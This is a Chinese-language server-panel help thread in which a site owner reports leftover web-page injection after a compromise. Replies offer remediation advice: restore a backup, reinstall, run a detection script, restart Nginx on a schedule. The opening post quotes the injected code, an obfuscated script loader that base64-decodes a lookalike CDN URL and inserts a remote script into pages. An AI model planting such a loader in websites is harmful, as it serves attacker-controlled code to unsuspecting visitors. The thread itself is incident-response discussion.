当前位置:论坛首页 > Linux面板 > 求助

【待反馈】本次大面积挂马没有完全被清除,还有残留,...

发表在 Linux面板2022-12-15 13:51 [复制链接] 7 6019

按照官方的指导,自己手动清理了两个木马,但是访问html文件还是有被挂马的代码,这并不是普通的文件挂马,通过查看源文件发现不了,感觉Nginx挂马没有清除干净,服务器还是存在被提权的情况。代码如下:

<script>(function() {var hm = document.createElement("script");hm.src = atob("aHR0cHM6Ly9jZG4uYm9vdHNjZG4ub3JnL2FqYXgvbGlicy9qcXVlcnkvMy42LjEvanF1ZXJ5Lmpz");var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();</script>

有没有人有相同的经历?


使用道具 举报 只看该作者 回复
发表于 2022-12-15 13:56:41 | 显示全部楼层
有那时间清马都不如直接还原备份(前提这个备份,确保文件都安全)。
再有问题,直接重装系统,从头再来一遍。
他黑你,也滴从来一遍,好好分析怎么进来的,给他点措施防止再来光顾你
使用道具 举报 回复 支持 反对
发表于 2022-12-15 14:21:18 | 显示全部楼层
您好,您可以使用下面文档内的检测脚本检查下,如果返回有提示,则根据帖子内的联系方式联系我们同事协助您溯源

https://www.bt.cn/bbs/thread-105121-1-1.html
使用道具 举报 回复 支持 反对
发表于 2022-12-15 17:02:11 | 显示全部楼层
谢花郎 发表于 2022-12-15 14:21
您好,您可以使用下面文档内的检测脚本检查下,如果返回有提示,则根据帖子内的联系方式联系我们同事协助您 ...

这个nginx的木马已经清除了   我发这个好像是内存注入挂马 不知道怎么解决?
使用道具 举报 回复 支持 反对
发表于 2022-12-15 17:03:08 | 显示全部楼层
myboss 发表于 2022-12-15 13:56
有那时间清马都不如直接还原备份(前提这个备份,确保文件都安全)。
再有问题,直接重装系统,从头再 ...

重装影响太大了 太麻烦...
使用道具 举报 回复 支持 反对
发表于 2022-12-15 17:24:19 | 显示全部楼层
选择很重要 发表于 2022-12-15 17:02
这个nginx的木马已经清除了   我发这个好像是内存注入挂马 不知道怎么解决? ...

如果是确定注入到内存的话,可以做个定时任务去处理重启nginx
使用道具 举报 回复 支持 反对
发表于 2022-12-15 18:02:28 | 显示全部楼层
选择很重要 发表于 2022-12-15 17:02
这个nginx的木马已经清除了   我发这个好像是内存注入挂马 不知道怎么解决? ...

这马子,挺高级呀,不整个蜜罐,骗他命令,都可惜了  安装一个堡塔企业级防篡改 - 重构版,linux被攻破了,马也进不来
使用道具 举报 回复 支持 反对
发表于 2022-12-15 19:50:55 | 显示全部楼层
myboss 发表于 2022-12-15 18:02
这马子,挺高级呀,不整个蜜罐,骗他命令,都可惜了  安装一个堡塔企业级防篡改 - 重构版,linux被攻 ...

感谢您的分享
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表